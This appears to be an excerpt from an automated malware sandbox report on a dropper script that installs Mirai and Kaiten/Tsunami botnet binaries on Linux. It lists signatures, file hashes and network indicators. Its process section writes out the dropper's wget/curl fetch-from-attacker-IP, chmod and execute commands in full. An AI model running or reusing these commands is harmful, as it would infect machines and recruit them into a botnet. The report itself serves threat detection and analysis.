| SHA512 | ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6 |
/tmp/GoldAge3ATOarm5
| MD5 | d8e7f95f2de61c8a75cf9cf7777ba06d |
| SHA1 | 040e5656fed375ef1c7e253822f0edb3f350616b |
| SHA256 | 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db |
| SHA512 | 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8 |
/tmp/GoldAge3ATOarm6
| MD5 | 3c5c66502403c26ffd38c305e0073e56 |
| SHA1 | 584b0a7b269f9e07d3d1ca9880b8710f035e435a |
| SHA256 | f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900 |
| SHA512 | 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89 |
/tmp/GoldAge3ATOarm7
| MD5 | d1bc7e87209a400dfa40307eca08289a |
| SHA1 | b9922e7972f0c46ecbcc18503b37b46299d3eaf9 |
| SHA256 | 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b |
| SHA512 | 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50 |
/tmp/GoldAge3ATOm68k
| MD5 | b9e708d1101756b3452ff33eaaa984f9 |
| SHA1 | f7744930aa85da6dbf7785c91e01e419987ce4e5 |
| SHA256 | 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1 |
| SHA512 | 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa |
/tmp/GoldAge3ATOmips
| MD5 | db3d52d93de2b229748c916d261ca0d5 |
| SHA1 | 29889196802fe35c0e5933991bd7f4a89de56946 |
| SHA256 | 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5 |
| SHA512 | 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652 |
/tmp/GoldAge3ATOmpsl
| MD5 | 2439dbad4a1cb56d7ea54b35aa36251e |
| SHA1 | b9d2099aaab3868094bb20bf556b3b20e8ea5203 |
| SHA256 | 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552 |
| SHA512 | 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25 |
/tmp/GoldAge3ATOppc
| MD5 | 92038a8e6f1123573cf5cd61d21f61ed |
| SHA1 | cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083 |
| SHA256 | a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8 |
| SHA512 | 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567 |
/tmp/GoldAge3ATOsh4
| MD5 | 5eba0470ee235a99e4b34517333a1cd1 |
| SHA1 | 0e417be4cc0769c9480f245941c2f0463147d1fd |
| SHA256 | ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb |
| SHA512 | 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468 |
/tmp/GoldAge3ATOspc
| MD5 | dfcc2c1625e3a1788667a70ca731dedb |
| SHA1 | bdc644788b8599579d8ce88e47270dc67839b226 |
| SHA256 | 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3 |
| SHA512 | 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57 |
/tmp/GoldAge3ATOx64
| MD5 | 399037675ef247197dec6471d9bfbf57 |
| SHA1 | 1fa81b589ee9e8764216b386e4fd5d1d3738bc39 |
| SHA256 | 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298 |
| SHA512 | 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1 |
/tmp/GoldAge3ATOx86
| MD5 | b6fe48263b89bb87446e76bb55170f26 |
| SHA1 | d88d976b1701dafe670a07313f14d3f217855850 |
| SHA256 | 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c |
| SHA512 | 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b |
/tmp/bash
| MD5 | 89ce675ecc4ca2e46f1c412a7074aaf9 |
| SHA1 | cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d |
| SHA256 | c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8 |
| SHA512 | a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-20 17:08
Reported
2025-05-20 17:10
Platform
debian9-armhf-20250410-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GoldAge3ATOarm | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm5 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm6 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm7 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOm68k | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmips | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmpsl | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOppc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOsh4 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOspc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx64 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx86 | /tmp/x.sh | N/A |
| N/A | /tmp/bash | /tmp/x.sh | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/GoldAge3ATOarm | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/GoldAge3ATOarm | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 84.162.70.65 | N/A | N/A |
Enumerates active TCP sockets
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | /tmp/GoldAge3ATOarm | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | bhabssbbahhbahhhasa | /tmp/GoldAge3ATOarm | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | /tmp/GoldAge3ATOarm | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/647/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/279/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/594/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/642/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/649/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/650/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/1/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/311/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/227/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/309/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/593/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/291/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/683/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/681/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/655/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/686/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/321/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/587/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/594/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/316/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/593/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/685/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/685/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/574/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/143/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/293/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/648/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/574/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/834/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/681/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/278/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/771/exe | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/168/fd | /tmp/GoldAge3ATOarm | N/A |
| File opened for reading | /proc/294/fd | /tmp/GoldAge3ATOarm | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/GoldAge3ATOmips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/wget | N/A |
Processes
/tmp/x.sh
[/tmp/x.sh]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm]
/tmp/GoldAge3ATOarm
[/tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm5]
/tmp/GoldAge3ATOarm5
[/tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm6]
/tmp/GoldAge3ATOarm6
[/tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm7]
/tmp/GoldAge3ATOarm7
[/tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOm68k]
/tmp/GoldAge3ATOm68k
[/tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmips]
/tmp/GoldAge3ATOmips
[/tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmpsl]
/tmp/GoldAge3ATOmpsl
[/tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOppc]
/tmp/GoldAge3ATOppc
[/tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOsh4]
/tmp/GoldAge3ATOsh4
[/tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOspc]
/tmp/GoldAge3ATOspc
[/tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx64]
/tmp/GoldAge3ATOx64
[/tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx86]
/tmp/GoldAge3ATOx86
[/tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86.1]
/usr/bin/wget
[wget http://185.236.24.192/bash -O /tmp/bash]
/usr/bin/curl
[curl http://185.236.24.192/bash -o /tmp/bash]
/bin/chmod
[chmod +x /tmp/bash]
/tmp/bash
[/tmp/bash]
/bin/rm
[rm -rf /tmp/bash]
/bin/rm
[rm -rf /tmp/bash.1]
Network
| Country | Destination | Domain | Proto |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:27501 | tcp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| DE | 84.162.70.65:53 | udp |
Files
/tmp/GoldAge3ATOarm
| MD5 | c37a156e474db5c40f0affd035ee358f |
| SHA1 | 990bc43195246650ee6929c2c40afe7efa14d058 |
| SHA256 | 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876 |
| SHA512 | ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6 |
/tmp/GoldAge3ATOarm5
| MD5 | d8e7f95f2de61c8a75cf9cf7777ba06d |
| SHA1 | 040e5656fed375ef1c7e253822f0edb3f350616b |
| SHA256 | 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db |
| SHA512 | 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8 |
/tmp/GoldAge3ATOarm6
| MD5 | 3c5c66502403c26ffd38c305e0073e56 |
| SHA1 | 584b0a7b269f9e07d3d1ca9880b8710f035e435a |
| SHA256 | f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900 |
| SHA512 | 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89 |
/tmp/GoldAge3ATOarm7
| MD5 | d1bc7e87209a400dfa40307eca08289a |
| SHA1 | b9922e7972f0c46ecbcc18503b37b46299d3eaf9 |
| SHA256 | 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b |
| SHA512 | 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50 |
/tmp/GoldAge3ATOm68k
| MD5 | b9e708d1101756b3452ff33eaaa984f9 |
| SHA1 | f7744930aa85da6dbf7785c91e01e419987ce4e5 |
| SHA256 | 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1 |
| SHA512 | 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa |
/tmp/GoldAge3ATOmips
| MD5 | db3d52d93de2b229748c916d261ca0d5 |
| SHA1 | 29889196802fe35c0e5933991bd7f4a89de56946 |
| SHA256 | 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5 |
| SHA512 | 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652 |
/tmp/GoldAge3ATOmpsl
| MD5 | 2439dbad4a1cb56d7ea54b35aa36251e |
| SHA1 | b9d2099aaab3868094bb20bf556b3b20e8ea5203 |
| SHA256 | 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552 |
| SHA512 | 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25 |
/tmp/GoldAge3ATOppc
| MD5 | 92038a8e6f1123573cf5cd61d21f61ed |
| SHA1 | cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083 |
| SHA256 | a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8 |
| SHA512 | 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567 |
memory/793-1-0xb675b000-0xb676c044-memory.dmp
/tmp/GoldAge3ATOsh4
| MD5 | 5eba0470ee235a99e4b34517333a1cd1 |
| SHA1 | 0e417be4cc0769c9480f245941c2f0463147d1fd |
| SHA256 | ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb |
| SHA512 | 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468 |
/tmp/GoldAge3ATOspc
| MD5 | dfcc2c1625e3a1788667a70ca731dedb |
| SHA1 | bdc644788b8599579d8ce88e47270dc67839b226 |
| SHA256 | 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3 |
| SHA512 | 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57 |
/tmp/GoldAge3ATOx64
| MD5 | 399037675ef247197dec6471d9bfbf57 |
| SHA1 | 1fa81b589ee9e8764216b386e4fd5d1d3738bc39 |
| SHA256 | 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298 |
| SHA512 | 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1 |
/tmp/GoldAge3ATOx86
| MD5 | b6fe48263b89bb87446e76bb55170f26 |
| SHA1 | d88d976b1701dafe670a07313f14d3f217855850 |
